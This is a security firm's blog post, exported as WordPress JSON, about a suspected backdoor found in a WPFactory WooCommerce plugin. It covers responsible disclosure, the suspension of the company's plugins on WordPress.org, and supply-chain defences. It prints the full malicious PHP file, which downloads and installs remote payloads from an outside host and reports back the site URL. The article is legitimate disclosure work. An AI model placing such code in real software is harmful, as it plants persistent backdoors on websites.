{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/cz\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Data breach at WPFactory: 170,000 WordPress websites at risk"},"content":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percent of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, and the vast number of plugins available to extend its functionality.<\/p>\n\n\n\n<p>However, this same ecosystem has also become one of WordPress's biggest security challenges.<\/p>\n\n\n\n<p>At Ferber Enterprises, our cybersecurity team continuously monitors threats to the WordPress ecosystem, because vulnerabilities in plugins, themes, or supply chains can quickly turn into large-scale attacks affecting thousands of websites worldwide. 
In recent years, attackers have increasingly targeted plugin developers and distribution infrastructure rather than individual websites, which allows malicious code to spread through trusted software updates and official download channels.<\/p>\n\n\n\n<p>This week, a major controversy erupted around WPFactory, a well-known WordPress plugin developer whose products are installed on more than 170,000 websites worldwide. More than 80 plugins associated with the company were temporarily blocked on WordPress.org after our cybersecurity team discovered a suspected backdoor in the premium version of one of WPFactory's plugins.<\/p>\n\n\n\n<p>The event raised serious concerns across the WordPress community about software supply chain security, plugin review processes, and the growing sophistication of attacks targeting the open source ecosystem.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Discovery of Suspicious Plugin Behavior<\/h2>\n\n\n\n<p>We first came across the issue when our cybersecurity team at Ferber Enterprises noticed unusual behavior while testing the premium version of the \u201cEU VAT for WooCommerce Pro\u201d plugin, which is available directly from the official website.<\/p>\n\n\n\n<p>The investigation 
originally began after the plugin generated a fatal error during installation. While troubleshooting the problem, our analysts identified a suspicious PHP file named class-alg-wc-eu-vat-customer.php. The file exhibited behavior entirely inconsistent with the expected functionality of a WooCommerce VAT plugin.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 
'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . 
'\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>According to our analysis, the code attempted to:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Download an external ZIP archive from a remote server<\/li>\n\n\n\n<li>Modify WordPress core directories<\/li>\n\n\n\n<li>Communicate with external infrastructure<\/li>\n\n\n\n<li>Potentially execute remote code on compromised websites<\/li>\n<\/ul>\n\n\n\n<p>These indicators immediately suggested the possible presence of a hidden backdoor or a supply chain compromise.<\/p>\n\n\n\n<p>What made the situation particularly concerning was that the plugin had not been downloaded from an unofficial mirror or a pirated repository. 
The package was downloaded directly from WPFactory's official customer portal, which further reinforced concerns that the distribution channel itself might have been compromised.<\/p>\n\n\n\n<p>At Ferber Enterprises, we immediately documented the incident and began the responsible disclosure process by contacting WPFactory directly via GitHub.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Initial Response from WPFactory<\/h2><\/div>\n\n\n\n<p>WPFactory initially responded by stating that the suspicious file and the behavior described in the report were not part of their official source code.<\/p>\n\n\n\n<p>A company representative suggested several alternative explanations, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A modified local installation<\/li>\n\n\n\n<li>A compromised website environment<\/li>\n\n\n\n<li>An outdated plugin version<\/li>\n\n\n\n<li>A potentially altered download source<\/li>\n<\/ul>\n\n\n\n<p>The company also stated that it was unable to safely inspect the provided ZIP file because their browser flagged the archive as potentially dangerous.<\/p>\n\n\n\n<p>Our cybersecurity team subsequently clarified that the plugin had been downloaded directly from the official WPFactory website and that the suspicious file remained present even after a fresh copy of version 4.6.1 was downloaded from the same 
source.<\/p>\n\n\n\n<p>This detail became a key point of the investigation. If multiple independent downloads from the official distribution channel consistently contained the same suspicious code, the possibility of a compromised local website appeared increasingly unlikely. Despite these findings, WPFactory initially stated that it had been unable to reproduce the issue on its side and maintained that the suspicious file did not exist in the official plugin package.<\/p>\n\n\n\n<p>The company then requested administrator access and FTP access to the affected environment in order to continue its investigation. At Ferber Enterprises, we declined this request for cybersecurity reasons. Granting privileged server access to a vendor whose own infrastructure might have been compromised would have posed an unacceptable security risk. Instead, our team continued to provide technical evidence, including a video recording that captured the plugin's suspicious behavior immediately after installation.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Escalation to WordPress.org<\/h2><\/div>\n\n\n\n<p>As the investigation progressed, concerns grew about the possible scale of the problem. 
WPFactory maintains an extensive plugin portfolio comprising more than 65 plugins with a combined total of over 170,000 active installations. Any attack on the company's distribution infrastructure could therefore have far-reaching consequences for the entire WordPress ecosystem.<\/p>\n\n\n\n<p>Our team escalated the issue directly to the WordPress.org team to prevent further users from installing potentially compromised packages while the investigation was ongoing. WordPress.org subsequently took the exceptional step of temporarily removing more than 80 WPFactory plugins from the official repository.<\/p>\n\n\n\n<p>This move immediately drew the attention of the entire WordPress security community, because mass plugin suspensions on this scale are relatively rare and usually signal serious unresolved problems. After the matter gained wider attention, WPFactory later acknowledged that the issue appeared to be legitimate and apologized for not responding more quickly to the original report. Company representatives stated that they were actively investigating the matter and working to resolve it. 
One hypothesis raised internally by WPFactory suggested that an outdated or cached plugin package might have been inadvertently served through their infrastructure.<\/p>\n\n\n\n<p>However, our cybersecurity team disagreed with this assessment. The observed behavior strongly suggested a deeper security problem that could involve compromised build pipelines, distribution systems, or unauthorized code injection into downloadable plugin archives.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Why This Incident Became Important<\/h2>\n\n\n\n<p>The WPFactory controversy highlights a growing cybersecurity threat known as a software supply chain attack. In the past, attackers focused on compromising individual websites directly through brute-force attacks or by exploiting plugin vulnerabilities. Today, attackers increasingly target software vendors themselves, because compromising a trusted vendor allows malicious code to be distributed to thousands of websites at once.<\/p>\n\n\n\n<p>This strategy has already been observed in several major cyber incidents affecting global software ecosystems over the past decade. 
In the WordPress ecosystem specifically, plugin developers are attractive targets because plugins are inherently trusted by administrators and often operate with elevated privileges.<\/p>\n\n\n\n<p>If malicious code makes its way into a plugin package distributed through an official channel, affected websites may unknowingly install malware. In the case of the suspicious WPFactory plugin, the potential consequences are serious.<\/p>\n\n\n\n<p>Based on our analysis, the identified behavior could theoretically allow attackers to:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Deploy additional malware<\/li>\n\n\n\n<li>Inject SEO spam<\/li>\n\n\n\n<li>Create persistent backdoors<\/li>\n\n\n\n<li>Exfiltrate sensitive data<\/li>\n\n\n\n<li>Remotely control WordPress installations<\/li>\n\n\n\n<li>Maintain unauthorized access over an extended period<\/li>\n<\/ul>\n\n\n\n<p>The danger of such attacks lies in their stealth. Modern backdoors are often designed to remain dormant for months before activating, which makes them harder to detect. 
Earlier this month, the WordPress Plugins team reportedly closed more than 30 plugins after hidden malicious code inserted into another plugin portfolio remained dormant for approximately eight months before finally activating and injecting SEO spam into websites.<\/p>\n\n\n\n<p>This trend shows how attackers increasingly favor persistence and delayed activation to evade detection mechanisms.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">The Broader Security Crisis in the WordPress Ecosystem<\/h2><\/div>\n\n\n\n<p>The WPFactory incident also points to broader systemic security problems affecting the entire WordPress landscape. The plugin ecosystem has grown dramatically over the past decade, with tens of thousands of plugins available across official and commercial marketplaces. Although this ecosystem fosters innovation and flexibility, it also makes security oversight considerably more difficult.<\/p>\n\n\n\n<p>According to Patchstack's report \u201cState of WordPress Security in 2026\u201d, nearly 461,000 known vulnerabilities had not been patched before they were publicly disclosed. 
This figure reflects the growing burden faced by plugin developers, security researchers, and repository maintainers.<\/p>\n\n\n\n<p>At the same time, the official WordPress plugin review queue reportedly now exceeds 4,000 plugins awaiting review. These numbers illustrate the enormous challenge of ensuring quality and conducting security audits at scale.<\/p>\n\n\n\n<p>Many plugin developers are small teams with limited security resources. Others manage dozens of plugins at once while pursuing aggressive business growth strategies involving acquisitions and portfolio expansion. WPFactory itself recently grew through acquisitions, including the purchase of Extend-WP and its 19 plugins in 2025, followed later the same year by the acquisition of WBW and several other plugins.<\/p>\n\n\n\n<p>Rapid portfolio expansion can create operational complexity that makes code auditing, infrastructure management, and release integrity verification more difficult. Attackers are well aware of these realities. 
They increasingly focus on exploiting weak operational security practices at software vendors instead of targeting end users directly.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Growing Importance of Supply Chain Security<\/h2>\n\n\n\n<p>Incidents of this kind reinforce the urgent need for stronger supply chain security practices across the entire WordPress ecosystem.<\/p>\n\n\n\n<p>The Ferber Enterprises cybersecurity team strongly recommends that plugin developers implement several key security measures, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cryptographic package signing<\/li>\n\n\n\n<li>Secure CI\/CD pipelines<\/li>\n\n\n\n<li>Mandatory multi-factor authentication<\/li>\n\n\n\n<li>Infrastructure segmentation<\/li>\n\n\n\n<li>Continuous integrity monitoring<\/li>\n\n\n\n<li>Independent security code audits<\/li>\n\n\n\n<li>Reproducible build systems<\/li>\n<\/ul>\n\n\n\n<p>Website administrators should also strengthen their own security. 
Even plugins downloaded from official or trusted sources cannot automatically be considered safe.<\/p>\n\n\n\n<p>Organizations managing critical WordPress infrastructure should consider:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Maintaining staging environments<\/li>\n\n\n\n<li>Monitoring outbound traffic<\/li>\n\n\n\n<li>Scanning plugins before deployment<\/li>\n\n\n\n<li>Limiting plugin usage<\/li>\n\n\n\n<li>Applying least-privilege access controls<\/li>\n\n\n\n<li>Implementing file integrity monitoring<\/li>\n\n\n\n<li>Using managed web application firewalls (WAF)<\/li>\n<\/ul>\n\n\n\n<p>In enterprise environments, supply chain validation is becoming as important as traditional vulnerability management. 
The assumption that official software channels are always safe is no longer realistic in today's threat landscape.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Community Reaction and Ongoing Investigation<\/h2>\n\n\n\n<p>The controversy spread quickly through the WordPress community after developers, security researchers, and infrastructure providers began discussing the issue publicly.<\/p>\n\n\n\n<p>Several well-known figures in the ecosystem raised awareness of the situation, including developers who published lists of the temporarily closed plugins and urged administrators to audit their environments.<\/p>\n\n\n\n<p>Meanwhile, our team at Ferber Enterprises continues to analyze suspicious plugin samples and monitor for further signs of compromise that could threaten WordPress websites worldwide.<\/p>\n\n\n\n<p>At the time of publication, WPFactory has confirmed the issue and stated that it is actively working to resolve it.<\/p>\n\n\n\n<p>However, many questions remain unanswered:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Was the official distribution infrastructure compromised?<\/li>\n\n\n\n<li>How long were potentially malicious packages being distributed?<\/li>\n\n\n\n<li>Were other plugins affected?<\/li>\n\n\n\n<li>Were customer accounts or download systems breached?<\/li>\n\n\n\n<li>Did 
attackers gain persistent access to internal infrastructure?<\/li>\n\n\n\n<li>Could additional dormant payloads still exist?<\/li>\n<\/ul>\n\n\n\n<p>Until these questions are fully resolved, caution remains essential.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Future of WordPress Security<\/h2>\n\n\n\n<p>The WPFactory incident may ultimately become another example of the cybersecurity challenges facing the open source software ecosystem on the web.<\/p>\n\n\n\n<p>WordPress powers a huge portion of the global internet economy. Any large-scale compromise affecting plugin developers can therefore have consequences reaching far beyond individual websites.<\/p>\n\n\n\n<p>As attackers increasingly exploit supply chain vulnerabilities and stealthy persistence techniques, plugin security can no longer be treated as a secondary concern. At Ferber Enterprises, we believe this event is an important reminder that cybersecurity is not only about protecting websites themselves, but also about securing every level of the software distribution chain.<\/p>\n\n\n\n<p>Trust in open ecosystems depends on transparency, rapid incident response, and strong operational security practices. 
The WordPress ecosystem now faces an important moment.<\/p>\n\n\n\n<p>How developers, repository maintainers, hosting providers, and security teams respond to incidents like this one will help determine whether WordPress can continue to maintain the trust of the millions of businesses and organizations that rely on it every day.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percent of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeli
ne\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-
below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center 
center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading 
.uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading 
.uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure 